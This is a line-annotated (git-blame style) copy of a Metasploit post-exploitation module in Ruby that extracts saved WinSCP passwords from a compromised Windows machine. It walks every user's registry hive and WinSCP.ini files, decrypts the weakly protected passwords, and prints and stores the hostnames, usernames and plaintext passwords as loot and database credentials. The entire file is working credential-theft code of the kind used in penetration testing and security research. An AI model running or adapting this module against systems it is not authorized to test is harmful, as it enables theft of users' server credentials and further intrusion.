2011-04-26 23:55:56 +00:00
|
|
|
##
|
2014-10-17 16:47:33 +00:00
|
|
|
# This module requires Metasploit: http://metasploit.com/download
|
2013-10-15 18:50:46 +00:00
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
2011-04-26 23:55:56 +00:00
|
|
|
##
|
|
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
require 'rex'
|
|
|
|
require 'rex/parser/ini'
|
2015-08-01 19:44:14 +00:00
|
|
|
require 'rex/parser/winscp'
|
2012-10-23 18:24:05 +00:00
|
|
|
require 'msf/core/auxiliary/report'
|
2011-04-26 23:55:56 +00:00
|
|
|
|
|
|
|
class Metasploit3 < Msf::Post
|
2013-08-30 21:28:54 +00:00
|
|
|
include Msf::Post::Windows::Registry
|
|
|
|
include Msf::Auxiliary::Report
|
|
|
|
include Msf::Post::Windows::UserProfiles
|
2014-06-02 23:07:44 +00:00
|
|
|
include Msf::Post::File
|
2015-08-01 19:44:14 +00:00
|
|
|
include Rex::Parser::WinSCP
|
2013-08-30 21:28:54 +00:00
|
|
|
|
|
|
|
def initialize(info={})
|
|
|
|
super(update_info(info,
|
|
|
|
'Name' => 'Windows Gather WinSCP Saved Password Extraction',
|
|
|
|
'Description' => %q{
|
|
|
|
This module extracts weakly encrypted saved passwords from
|
|
|
|
WinSCP. It searches for saved sessions in the Windows Registry
|
|
|
|
and the WinSCP.ini file. It cannot decrypt passwords if a master
|
|
|
|
password is used.
|
|
|
|
},
|
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
'Author' => [ 'theLightCosine'],
|
|
|
|
'Platform' => [ 'win' ],
|
|
|
|
'SessionTypes' => [ 'meterpreter' ]
|
|
|
|
))
|
|
|
|
end
|
|
|
|
|
|
|
|
def get_reg
|
|
|
|
# Enumerate all the SID in HKEY_Users and see if any of them have WinSCP RegistryKeys.
|
|
|
|
regexists = 0
|
|
|
|
|
|
|
|
userhives=load_missing_hives()
|
|
|
|
userhives.each do |hive|
|
|
|
|
next if hive['HKU'] == nil
|
|
|
|
master_key = "#{hive['HKU']}\\Software\\Martin Prikryl\\WinSCP 2\\Configuration\\Security"
|
|
|
|
masterpw = registry_getvaldata(master_key, 'UseMasterPassword')
|
|
|
|
|
|
|
|
#No WinSCP Keys here
|
|
|
|
next if masterpw.nil?
|
|
|
|
|
|
|
|
regexists = 1
|
|
|
|
if masterpw == 1
|
|
|
|
# Master Password used to add AES256 encryption to stored password
|
|
|
|
print_error("User #{hive['HKU']} is using a Master Password, cannot recover passwords")
|
|
|
|
next
|
|
|
|
|
|
|
|
else
|
|
|
|
# Take a look at any saved sessions
|
|
|
|
savedpwds = 0
|
|
|
|
session_key = "#{hive['HKU']}\\Software\\Martin Prikryl\\WinSCP 2\\Sessions"
|
|
|
|
saved_sessions = registry_enumkeys(session_key)
|
|
|
|
next if saved_sessions.nil?
|
|
|
|
saved_sessions.each do |saved_session|
|
|
|
|
# Skip default settings entry
|
|
|
|
next if saved_session == "Default%20Settings"
|
|
|
|
|
|
|
|
active_session = "#{hive['HKU']}\\Software\\Martin Prikryl\\WinSCP 2\\Sessions\\#{saved_session}"
|
|
|
|
password = registry_getvaldata(active_session, 'Password')
|
|
|
|
# There is no password saved for this session, so we skip it
|
|
|
|
next if password == nil
|
|
|
|
|
|
|
|
savedpwds = 1
|
|
|
|
portnum = registry_getvaldata(active_session, 'PortNumber')
|
|
|
|
if portnum == nil
|
|
|
|
# If no explicit port number entry exists, it is set to default port of tcp22
|
|
|
|
portnum = 22
|
|
|
|
end
|
|
|
|
|
2015-08-01 19:44:14 +00:00
|
|
|
encrypted_password = password
|
|
|
|
user = registry_getvaldata(active_session, 'UserName') || ""
|
|
|
|
fsprotocol = registry_getvaldata(active_session, 'FSProtocol') || ""
|
|
|
|
sname = parse_protocol(fsprotocol)
|
|
|
|
host = registry_getvaldata(active_session, 'HostName') || ""
|
|
|
|
|
|
|
|
plaintext = decrypt_password(encrypted_password, "#{user}#{host}")
|
|
|
|
|
|
|
|
winscp_store_config({
|
|
|
|
hostname: host,
|
|
|
|
username: user,
|
|
|
|
password: plaintext,
|
|
|
|
portnumber: portnum,
|
|
|
|
protocol: sname
|
|
|
|
})
|
2013-08-30 21:28:54 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
if savedpwds == 0
|
|
|
|
print_status("No Saved Passwords found in the Session Registry Keys")
|
|
|
|
end
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
if regexists == 0
|
|
|
|
print_status("No WinSCP Registry Keys found!")
|
|
|
|
end
|
|
|
|
unload_our_hives(userhives)
|
|
|
|
|
|
|
|
end
|
|
|
|
|
2015-08-01 19:44:14 +00:00
|
|
|
def run
|
|
|
|
print_status("Looking for WinSCP.ini file storage...")
|
2013-08-30 21:28:54 +00:00
|
|
|
|
2015-08-01 19:44:14 +00:00
|
|
|
# WinSCP is only x86...
|
|
|
|
if sysinfo['Architecture'] == 'x86'
|
|
|
|
prog_files_env = 'ProgramFiles'
|
|
|
|
else
|
|
|
|
prog_files_env = 'ProgramFiles(x86)'
|
2014-06-02 23:07:44 +00:00
|
|
|
end
|
2015-08-01 19:44:14 +00:00
|
|
|
env = get_envs('APPDATA', prog_files_env, 'USERNAME')
|
2014-06-02 23:07:44 +00:00
|
|
|
|
2015-08-01 19:44:14 +00:00
|
|
|
user_dir = "#{env['APPDATA']}\\..\\.."
|
|
|
|
user_dir << "\\.." if user_dir.include?('Users')
|
2014-06-02 23:07:44 +00:00
|
|
|
|
2015-08-01 19:44:14 +00:00
|
|
|
users = dir(user_dir)
|
|
|
|
users.each do |user|
|
|
|
|
next if user == "." || user == ".."
|
|
|
|
app_data = "#{env['APPDATA'].gsub(env['USERNAME'], user)}\\WinSCP.ini"
|
|
|
|
vprint_status("Looking for #{app_data}...")
|
|
|
|
get_ini(app_data) if file?(app_data)
|
2014-06-02 23:07:44 +00:00
|
|
|
end
|
|
|
|
|
2015-08-01 19:44:14 +00:00
|
|
|
program_files = "#{env[prog_files_env]}\\WinSCP\\WinSCP.ini"
|
2013-08-30 21:28:54 +00:00
|
|
|
|
2015-08-01 19:44:14 +00:00
|
|
|
get_ini(program_files) if file?(program_files)
|
2013-08-30 21:28:54 +00:00
|
|
|
|
2015-08-01 19:44:14 +00:00
|
|
|
print_status("Looking for Registry storage...")
|
|
|
|
get_reg
|
2013-08-30 21:28:54 +00:00
|
|
|
end
|
|
|
|
|
2015-08-01 19:44:14 +00:00
|
|
|
def get_ini(file_path)
|
|
|
|
print_good("WinSCP.ini located at #{file_path}")
|
|
|
|
file = read_file(file_path)
|
2015-08-01 19:52:25 +00:00
|
|
|
stored_path = store_loot('winscp.ini', 'text/plain', session, file, 'WinSCP.ini', file_path)
|
|
|
|
print_status("WinSCP saved to loot: #{stored_path}")
|
2015-08-01 19:44:14 +00:00
|
|
|
parse_ini(file).each do |res|
|
|
|
|
winscp_store_config(res)
|
2013-08-30 21:28:54 +00:00
|
|
|
end
|
|
|
|
end
|
2011-04-26 23:55:56 +00:00
|
|
|
|
2014-06-02 23:07:44 +00:00
|
|
|
def winscp_store_config(config)
|
2015-08-01 19:44:14 +00:00
|
|
|
begin
|
|
|
|
res = client.net.resolve.resolve_host(config[:hostname], AF_INET)
|
|
|
|
ip = res[:ip] if res
|
|
|
|
rescue Rex::Post::Meterpreter::RequestError => e
|
|
|
|
print_error("Unable to store following credentials in database as we are unable to resolve the IP address: #{e}")
|
|
|
|
ensure
|
|
|
|
print_good("Host: #{config[:hostname]}, IP: #{ip}, Port: #{config[:portnumber]}, Service: #{config[:protocol]}, Username: #{config[:username]}, Password: #{config[:password]}")
|
|
|
|
end
|
2014-06-02 23:07:44 +00:00
|
|
|
|
2015-08-01 19:44:14 +00:00
|
|
|
return unless ip
|
2014-06-02 23:07:44 +00:00
|
|
|
|
2014-06-03 16:48:08 +00:00
|
|
|
service_data = {
|
2015-08-01 19:44:14 +00:00
|
|
|
address: ip,
|
|
|
|
port: config[:portnumber],
|
|
|
|
service_name: config[:protocol],
|
2014-06-03 16:48:08 +00:00
|
|
|
protocol: 'tcp',
|
|
|
|
workspace_id: myworkspace_id,
|
|
|
|
}
|
|
|
|
|
|
|
|
credential_data = {
|
|
|
|
origin_type: :session,
|
|
|
|
session_id: session_db_id,
|
|
|
|
post_reference_name: self.refname,
|
|
|
|
private_type: :password,
|
2015-08-01 19:44:14 +00:00
|
|
|
private_data: config[:password],
|
|
|
|
username: config[:username]
|
2014-06-03 16:48:08 +00:00
|
|
|
}.merge(service_data)
|
|
|
|
|
|
|
|
credential_core = create_credential(credential_data)
|
|
|
|
|
|
|
|
login_data = {
|
|
|
|
core: credential_core,
|
2014-07-17 02:52:08 +00:00
|
|
|
status: Metasploit::Model::Login::Status::UNTRIED
|
2014-06-03 16:48:08 +00:00
|
|
|
}.merge(service_data)
|
|
|
|
|
|
|
|
create_credential_login(login_data)
|
2014-06-02 23:07:44 +00:00
|
|
|
end
|
2011-04-26 23:55:56 +00:00
|
|
|
|
|
|
|
end
|